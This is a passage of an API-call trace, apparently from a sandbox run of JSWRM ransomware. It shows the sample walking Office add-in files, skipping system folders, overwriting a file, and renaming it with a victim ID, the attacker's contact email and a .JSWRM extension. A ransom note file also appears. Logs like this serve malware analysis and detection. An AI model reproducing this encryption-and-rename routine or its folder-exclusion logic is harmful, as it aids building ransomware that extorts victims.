(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0124.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0124.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0124.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0124.918] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411d5d7f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x411d5d7f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x411d5d7f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.918] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0124.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0124.919] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf458770a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf458770a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45d3b76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12060, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.919] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0124.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0124.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.920] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.920] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0124.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0124.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.920] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc43098a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x70b0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.921] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0124.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0124.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0124.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0124.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.921] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0124.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0124.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0124.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0124.921] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15b71118, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e5d4, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.no.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2=".") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="..") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="...") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="windows") returned -1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="recovery") returned -1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="perflogs") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="documents and settings") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="system volume information") returned -1 [0124.921] lstrcmpiW (lpString1="PowerViewRes.no.xap", lpString2="msocache") returned 1 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.no.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.no.xap", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.no.xap", lpUsedDefaultChar=0x0) returned 19 [0124.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.no.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.no.xap", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.no.xap", lpUsedDefaultChar=0x0) returned 19 [0124.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0124.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\PowerViewRes.no.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\powerviewres.no.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.923] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=320980) returned 1 [0124.923] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.923] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.935] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.935] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.935] CloseHandle (hObject=0x338) returned 1 [0124.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0125.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0125.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0125.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0125.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\PowerViewRes.no.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\powerviewres.no.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\no\\PowerViewRes.no.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\no\\powerviewres.no.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0125.028] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x15b71118, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, 